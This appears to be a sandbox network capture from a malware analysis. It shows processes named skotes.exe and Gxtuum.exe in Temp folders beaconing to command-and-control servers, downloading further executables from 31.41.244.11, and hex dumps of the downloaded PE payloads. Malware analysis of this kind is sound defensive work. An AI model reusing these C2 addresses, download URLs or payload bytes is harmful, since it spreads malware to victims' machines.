                                                                                                                                                                                                                                                              Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 50 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 49 00 00 04 00 00 49 41 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL<_gPI@IIA@T0h 1 H@.rsrc X@.idata 0Z@ *@\@wekcazboP/^@ttllozcv@I@@.taggant0PI"F@
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.617891073 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.617911100 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618005037 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618022919 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618040085 CET672INData Raw: 60 d6 64 f6 50 fe 65 fd 22 2a 36 e1 00 0d c7 31 0b ae 98 c7 7f 3e 2f fd 35 77 e3 00 d6 8c dc b2 a1 41 af 59 38 49 ba 2b c7 4d 44 49 7c 5a 91 23 7f 68 10 38 a3 e4 7f 79 fc 7c b8 14 3c c5 1c e5 82 70 ee a9 a2 b4 59 8e 22 03 8d 25 6d b6 d9 37 84 dc
                                                                                                                                                                                                                                                              Data Ascii: `dPe"*61>/5wAY8I+MDI|Z#h8y|<pY"%m7ZvY^fWS1D8Gk)LCucs$*pTr~@ue2jhw`Q,.,2}':bc#ne %$6EUC[8,37*m%1d;
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618220091 CET1236INData Raw: 97 3b e5 23 b5 da a7 73 07 7e 28 c8 44 1c a2 3b f8 76 9a c4 aa 4f 5c a1 af d2 b3 68 b6 50 76 ec ff b6 3c 34 c3 2e a6 05 22 5b de 53 bf 26 89 25 11 da 97 b1 7f 7a a4 07 23 82 02 ed 2c 5a b7 c6 8b 27 86 d9 2a 3e b3 00 8f 2d bc 57 78 22 4b 17 e0 ce
                                                                                                                                                                                                                                                              Data Ascii: ;#s~(D;vO\hPv<4."[S&%z#,Z'*>-Wx"Ke'!s\8o4e[W!|$}owtcry <r'UHZS^Xk#>#2RZ>->s(@91"sTv'r(K(D9Xa
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618237019 CET1236INData Raw: bd 8e 33 dd ec 7d e8 7b b5 46 3f fc ca 02 06 d9 d6 bd c9 0e f0 3d 9f 69 67 bf 00 c8 7e 33 23 c5 12 5e d6 41 ce 4b a8 cf 26 6f 27 dc b7 0b a2 de 24 51 c7 46 49 d6 af 78 8a db 9d 27 cc 20 aa f6 38 9a 03 19 6c b8 90 de bb 77 0b 28 b5 9d b7 10 bf 5b
                                                                                                                                                                                                                                                              Data Ascii: 3}{F?=ig~3#^AK&o'$QFIx' 8lw([k4< Oi"PVmkOev}`GCMw-d:_E7bR4HKacQdZ|fMm,&qIF.REt6qvX)jPXs( <i2~kv"-#
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618252993 CET1236INData Raw: e3 cc 1c 61 6c 9f 65 97 06 92 b1 5f 4b 49 a3 5e ff 5a 4a e7 6b 6b e2 96 65 c2 1e 78 47 9b b5 5c 3e d4 bb 51 69 7b 66 a0 50 8d ba 99 15 28 78 ab 96 b1 d8 4a 56 28 63 2e 4a ec 54 e0 a7 db ab 7b 2b a3 a3 ed 6a 91 c4 33 f2 98 10 da f3 66 20 a6 4f d6
                                                                                                                                                                                                                                                              Data Ascii: ale_KI^ZJkkexG\>Qi{fP(xJV(c.JT{+j3f Om>"d<Yc2"-(MU!x~#%f'qC#81Sx{g#8=*/x~9@0=0X=uTfs%X!;mV=x
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.618272066 CET1236INData Raw: ed e2 ab d6 94 c6 9a 68 e9 00 05 3e db ad 1b 50 56 e6 f2 a0 87 96 9f 14 f9 62 ac 2b c4 2b 5d 3c 94 8b 96 11 0b 85 22 37 2c 5d 32 1a a3 8c 44 19 c1 b5 9e 10 d7 ee 27 70 19 b2 ad 5d aa c2 ca a2 22 9a 17 a8 a9 3a 37 f2 fc 40 5d 12 1f 57 20 b1 e5 50
                                                                                                                                                                                                                                                              Data Ascii: h>PVb++]<"7,]2D'p]":7@]W Pjm+-#8l!qAc:np_ZZ C`D(TkT$j+Ju@~}>kZXb-PmjxI0g{U
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:28.737962008 CET1236INData Raw: ad 7a de d8 55 84 de ba da a8 61 9f a9 3c 3d 66 7b 5c 58 e0 6c c3 11 0c ec ac 0f fb dc 2d c9 a2 fd 92 dd e9 d3 cd ec 54 22 c0 db 50 76 1d 2d ee a7 c9 d9 1a 7a 5c a2 4b 48 a4 a3 14 82 6b d6 c3 d9 01 11 70 87 7a e9 d5 ed 79 2a 64 59 4b f6 35 95 52
                                                                                                                                                                                                                                                              Data Ascii: zUa<=f{\Xl-T"Pv-z\KHkpzy*dYK5Ry0An<cvd_gaf~+;+zb[#;#QU!)_[=tvKI9P+"a]-?[]YM&81rjzhT[)60sS;


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              7192.168.2.449824185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:34.634877920 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 39 38 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1019802001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:35.970523119 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:35 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              8192.168.2.44983031.41.244.11802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:36.122577906 CET63OUTGET /files/zhigarko/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.420952082 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:37 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 439296
                                                                                                                                                                                                                                                              Last-Modified: Sat, 21 Dec 2024 08:14:10 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "676678d2-6b400"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 01 33 64 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 00 02 00 00 00 00 00 27 a0 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$BS,,,/,)#,(,/,),,(,-,-j,U%,U,U.,Rich,PEL3dg'@0@EE8@<.textj `.rdataHJ@@.datam`,@@.rsrcl@@.relocEFn@B
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421088934 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 50 ca 44 00 e8 87 8d 02 00 59 c3 cc cc cc cc 68 f0 c9 44 00 e8 77 8d 02 00 59
                                                                                                                                                                                                                                                              Data Ascii: hPDYhDwYj hEdnF/hDVYj hEtFo/hD6YjhETuFO/hpDYj h$EoF//hDYjhHEL
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421122074 CET1236INData Raw: 74 46 00 e8 0f 2f 02 00 68 30 cc 44 00 e8 d6 8c 02 00 59 c3 cc cc cc 6a 24 68 5c d0 45 00 b9 8c 6d 46 00 e8 ef 2e 02 00 68 90 cc 44 00 e8 b6 8c 02 00 59 c3 cc cc cc 6a 00 68 7b ce 45 00 b9 24 75 46 00 e8 cf 2e 02 00 68 f0 cc 44 00 e8 96 8c 02 00
                                                                                                                                                                                                                                                              Data Ascii: tF/h0DYj$h\EmF.hDYjh{E$uF.hDYjh{EuF.hPDvYjh{EoF.hDVYjh{EmFo.hD6YjhEnFO.hpDYjhE8xF/.hDY
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421176910 CET224INData Raw: cc cc cc 6a 0c 68 38 d3 45 00 b9 2c 6d 46 00 e8 2f 2a 02 00 68 d0 da 44 00 e8 f6 87 02 00 59 c3 cc cc cc 6a 0c 68 48 d3 45 00 b9 c4 6e 46 00 e8 0f 2a 02 00 68 30 db 44 00 e8 d6 87 02 00 59 c3 cc cc cc 6a 04 68 58 d3 45 00 b9 98 78 46 00 e8 ef 29
                                                                                                                                                                                                                                                              Data Ascii: jh8E,mF/*hDYjhHEnF*h0DYjhXExF)hDYjh`ExF)hDYjhhEuF)hPDvYjhpEwF)hDVYjhxEnFo)hD6Y
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421206951 CET1236INData Raw: cc cc cc 6a 0c 68 84 d3 45 00 b9 28 79 46 00 e8 4f 29 02 00 68 70 dd 44 00 e8 16 87 02 00 59 c3 cc cc cc 6a 0c 68 94 d3 45 00 b9 5c 6d 46 00 e8 2f 29 02 00 68 d0 dd 44 00 e8 f6 86 02 00 59 c3 cc cc cc 6a 04 68 a4 d3 45 00 b9 ec 70 46 00 e8 0f 29
                                                                                                                                                                                                                                                              Data Ascii: jhE(yFO)hpDYjhE\mF/)hDYjhEpF)h0DYjhEmF(hDYjhE$oF(hDYjhEdqF(hPDvYjhEloF(hDVYjhE xFo(
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421242952 CET1236INData Raw: 68 b0 eb 44 00 e8 56 82 02 00 59 c3 cc cc cc 6a 4c 68 e0 d5 45 00 b9 c4 71 46 00 e8 6f 24 02 00 68 10 ec 44 00 e8 36 82 02 00 59 c3 cc cc cc 6a 3c 68 30 d6 45 00 b9 a4 6d 46 00 e8 4f 24 02 00 68 70 ec 44 00 e8 16 82 02 00 59 c3 cc cc cc 6a 0c 68
                                                                                                                                                                                                                                                              Data Ascii: hDVYjLhEqFo$hD6Yj<h0EmFO$hpDYjhpEsF/$hDYjhE<rF$h0DYjhEqF#hDYjhEtF#hDYj@hE$lF#hPDvYjPh
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421278000 CET448INData Raw: 45 00 b9 b4 72 46 00 e8 af 1f 02 00 68 50 fa 44 00 e8 76 7d 02 00 59 c3 cc cc cc 6a 20 68 64 da 45 00 b9 0c 6f 46 00 e8 8f 1f 02 00 68 b0 fa 44 00 e8 56 7d 02 00 59 c3 cc cc cc 6a 0c 68 88 da 45 00 b9 e0 78 46 00 e8 6f 1f 02 00 68 10 fb 44 00 e8
                                                                                                                                                                                                                                                              Data Ascii: ErFhPDv}Yj hdEoFhDV}YjhExFohD6}YjhErFOhpD}YjhEtF/hD|YjhE,vFh0D|YhD|YhD|YhPD|Yj@hE
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421430111 CET1236INData Raw: 7e 02 00 b8 c4 60 46 00 c7 45 f0 68 60 46 00 89 45 ec 83 65 fc 00 c7 05 c4 60 46 00 4c 16 45 00 c7 45 fc 01 00 00 00 68 3c 3a 46 00 50 68 74 60 46 00 e8 15 58 02 00 83 4d fc ff 68 06 01 45 00 e8 87 7b 02 00 83 c4 10 e8 1f 7e 02 00 c3 6a 08 b8 df
                                                                                                                                                                                                                                                              Data Ascii: ~`FEh`FEe`FLEEh<:FPht`FXMhE{~jD5~\`FE`FEe\`F0EEh:FPh`FWMhE0{}h0FF^$E{YjhFjhEz,Fs_h.EzYh$E
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421458960 CET224INData Raw: cc cc cc cc cc cc cc 68 68 ce 45 00 e8 42 5d 02 00 cc cc cc cc cc cc 55 8b ec 83 ec 0c a1 24 61 46 00 33 c5 89 45 fc 8b 55 08 8d 45 f4 56 8b f1 89 55 f4 8d 4e 04 c6 45 f8 01 51 0f 57 c0 c7 06 24 16 45 00 50 66 0f d6 01 e8 8a 84 02 00 8b 4d fc 83
                                                                                                                                                                                                                                                              Data Ascii: hhEB]U$aF3EUEVUNEQW$EPfM0E3^3p]UVWFP$EfEP>0E^]UEu]PaUEU
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.421526909 CET1236INData Raw: 89 10 89 48 04 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 01 8d 55 f8 83 ec 08 56 ff 75 08 52 ff 50 0c 8b 75 0c 8b 48 04 8b 56 04 8b 49 04 3b 4a 04 75 0f 8b 00 3b 06 75 09 b0 01 5e 8b e5 5d c2 08 00 32 c0 5e 8b e5 5d c2 08
                                                                                                                                                                                                                                                              Data Ascii: H]UUVuRPuHVI;Ju;u^]2^]UAVuV;Bu;Eu^]2^]AkFSUkl$jhDdPSX$aF3EVWPEd}CMP}NCsE
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:37.541243076 CET1236INData Raw: 00 50 66 0f d6 01 e8 19 7f 02 00 8b 4d fc 83 c4 08 c7 06 98 e1 45 00 8b c6 33 cd 5e e8 c2 6a 02 00 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 4d 85 44 00 64 a1 00 00 00 00 50 83 ec 08 a1 24 61 46 00 33 c5 89 45 f0 56
                                                                                                                                                                                                                                                              Data Ascii: PfME3^j]UjhMDdP$aF3EVPEduuEvFVEPjVpMdY^M3Dj]UVj'nMEWVuFF,@vNFyPu^]


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              9192.168.2.449842185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:41.062256098 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 39 38 30 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1019803001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.398740053 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:42 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              10192.168.2.449846212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.261593103 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              11192.168.2.44985131.41.244.11802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:42.523338079 CET68OUTGET /files/kardanvalov88/random.exe HTTP/1.1
                                                                                                                                                                                                                                                              Host: 31.41.244.11
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848618984 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:43 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 605696
                                                                                                                                                                                                                                                              Last-Modified: Thu, 12 Dec 2024 15:01:10 GMT
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              ETag: "675afab6-93e00"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d 93 ba 99 09 f2 d4 ca 09 f2 d4 ca 09 f2 d4 ca 42 8a d7 cb 0c f2 d4 ca 42 8a d1 cb b6 f2 d4 ca 19 76 d7 cb 03 f2 d4 ca 19 76 d0 cb 18 f2 d4 ca 42 8a d2 cb 08 f2 d4 ca 19 76 d1 cb 63 f2 d4 ca 52 9a d5 cb 0b f2 d4 ca 42 8a d0 cb 12 f2 d4 ca 42 8a d5 cb 18 f2 d4 ca 09 f2 d5 ca cf f2 d4 ca 42 77 dd cb 0c f2 d4 ca 42 77 2b ca 08 f2 d4 ca 09 f2 43 ca 08 f2 d4 ca 42 77 d6 cb 08 f2 d4 ca 52 69 63 68 09 f2 d4 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 31 b5 31 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 ee 06 00 00 6c 02 00 00 00 00 00 0c 32 04 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MBBvvBvcRBBBwBw+CBwRichPEd11g")l2@``HtLpp(@@.text> `.rdatad@@.data;@.pdatatLN@@.rsrcH`,@@.relocp2@B
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848639011 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 55 48 8d ac 24 50 fe ff ff 48 81 ec b0 02 00 00 0f 57 c0 0f 11 44 24 30 0f 57
                                                                                                                                                                                                                                                              Data Ascii: @UH$PHWD$0WfL$@A H)HL$0g4WD$PWfL$`AHHL$P>4WD$pWfMA HHL$p4WEWfMAHH
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848658085 CET1236INData Raw: 4d 90 e8 f0 33 02 00 90 0f 57 c0 0f 11 45 b0 0f 57 c9 66 0f 7f 4d c0 41 b8 20 00 00 00 48 8d 15 f3 ab 07 00 48 8d 4d b0 e8 ca 33 02 00 90 0f 57 c0 0f 11 45 d0 0f 57 c9 66 0f 7f 4d e0 41 b8 06 00 00 00 48 8d 15 c1 ab 07 00 48 8d 4d d0 e8 a4 33 02
                                                                                                                                                                                                                                                              Data Ascii: M3WEWfMA HHM3WEWfMAHHM3WEWfMA HHM~3WEWfM AHHMX3WE0WfM@A HHM023WEPWfM`AHHMP3WEp
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848788977 CET1236INData Raw: 48 8d 15 d4 a7 07 00 48 8d 4d 70 e8 13 2f 02 00 90 0f 57 c0 0f 11 85 90 00 00 00 0f 57 c9 66 0f 7f 8d a0 00 00 00 41 b8 21 00 00 00 48 8d 15 68 a9 07 00 48 8d 8d 90 00 00 00 e8 e4 2e 02 00 90 0f 57 c0 0f 11 85 b0 00 00 00 0f 57 c9 66 0f 7f 8d c0
                                                                                                                                                                                                                                                              Data Ascii: HHMp/WWfA!HhH.WWfA HH.WWfA!H2H.WWfA H{HW.WWf A!HH
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848807096 CET1236INData Raw: 8d 4c 24 20 e8 46 2a 02 00 90 0f 57 c0 0f 11 44 24 40 0f 57 c9 66 0f 7f 4c 24 50 41 b8 6d 00 00 00 48 8d 15 67 a6 07 00 48 8d 4c 24 40 e8 1d 2a 02 00 90 0f 57 c0 0f 11 44 24 60 0f 57 c9 66 0f 7f 4c 24 70 41 b8 06 00 00 00 48 8d 15 1e a7 07 00 48
                                                                                                                                                                                                                                                              Data Ascii: L$ F*WD$@WfL$PAmHgHL$@*WD$`WfL$pAHHL$`)WEWfMAmHHM)WEWfMAHHM)WEWfMAjHHM)WEWfMAHeHM\)
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848824024 CET672INData Raw: 06 00 48 83 c4 28 e9 3c 0e 04 00 48 8d 0d 19 db 06 00 e9 30 0e 04 00 48 8d 0d b1 da 06 00 e9 24 0e 04 00 48 8b 15 71 d6 08 00 4c 8d 05 2a cf 08 00 4c 89 05 6b d6 08 00 48 85 d2 74 13 48 8b 02 48 63 48 04 4c 89 44 11 50 4c 8b 05 53 d6 08 00 48 8b
                                                                                                                                                                                                                                                              Data Ascii: H(<H0H$HqL*LkHtHHcHLDPLSHTHtHHcHLDPH(HHH(H(AH/E3HxHH(H(xHHHH(_H(A
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.848841906 CET1236INData Raw: 06 00 e9 a0 0b 04 00 48 83 ec 28 48 8d 0d 69 d5 08 00 e8 6c 01 04 00 48 8d 0d 3d da 06 00 48 83 c4 28 e9 80 0b 04 00 cc cc cc cc 48 8d 0d 39 da 06 00 e9 70 0b 04 00 cc cc cc cc 48 8d 05 81 e8 08 00 c3 cc cc cc cc cc cc cc cc 4c 89 44 24 18 4c 89
                                                                                                                                                                                                                                                              Data Ascii: H(HilH=H(H9pHLD$LL$ SUVWH8IHl$xHHHl$(LLHD$ HHHHH8_^][@SH HHHWHSHHH$HH [HyH
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.849088907 CET1236INData Raw: cf e8 91 fd ff ff 48 8b 54 24 60 48 83 fa 0f 76 2e 48 ff c2 48 8b 4c 24 48 48 8b c1 48 81 fa 00 10 00 00 72 15 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 77 29 e8 b8 00 04 00 48 8d 05 b1 e2 06 00 48 89 07 0f 11 77 18 48 8b c7 0f 28
                                                                                                                                                                                                                                                              Data Ascii: HT$`Hv.HHL$HHHrH'HIH+HHw)HHwH($H_^[/)H\$WH HHHH t(HLH\$0HH _H\$WHPDHHL$ HHJHT$(HPHT$(
                                                                                                                                                                                                                                                              Dec 22, 2024 02:16:43.849175930 CET448INData Raw: 48 8b c1 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 78 8b d1 48 8d 4c 24 30 e8 d0 ff ff ff 48 8d 54 24 20 48 8d 4c 24 40 0f 10 00 0f 29 44 24 20 e8 b9 fb ff ff 48 8d 15 2a 8f 08 00 48 8d 4c 24 40 e8 08 1e 04 00 cc cc cc cc cc cc cc
                                                                                                                                                                                                                                                              Data Ascii: HHxHL$0HT$ HL$@)D$ H*HL$@HHAHAHHHHHHL$ HHL$ @SH HHHWHSHHHCHHHHH [3
